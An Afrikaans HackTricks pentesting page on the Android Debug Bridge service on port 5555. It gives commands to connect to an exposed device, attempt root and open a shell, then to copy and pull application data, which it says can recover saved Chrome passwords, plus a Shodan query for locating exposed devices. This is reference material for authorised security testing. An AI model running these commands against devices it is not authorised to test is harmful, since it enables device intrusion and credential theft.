hacktricks/network-services-pentesting/5555-android-debug-bridge.md
2024-02-11 02:07:06 +00:00

4 KiB

5555 - Android Debug Bridge

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Basiese Inligting

Vanaf die dokumentasie:

Android Debug Bridge (adb) is 'n veelsydige opdraglynhulpmiddel wat jou in staat stel om met 'n toestel te kommunikeer. Die adb-opdrag fasiliteer 'n verskeidenheid toestelaksies, soos die installeer en foutopsporing van programme, en dit bied toegang tot 'n Unix-skil wat jy kan gebruik om 'n verskeidenheid opdragte op 'n toestel uit te voer.

Verstekpoort: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Koppel

As jy die ADB-diens vind wat op 'n poort van 'n toestel loop en jy kan daarmee koppel, kan jy 'n skulp binne die stelsel kry:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Vir meer ADB-opdragte, kyk na die volgende bladsy:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Stort App-data

Om die data van 'n toepassing heeltemal af te laai, kan jy die volgende doen:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Jy kan hierdie truuk gebruik om sensitiewe inligting soos Chrome-wagwoorde te herwin. Vir meer inligting hieroor, kyk na die inligting en verwysings wat hier verskaf word.

Shodan

  • android debug bridge
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: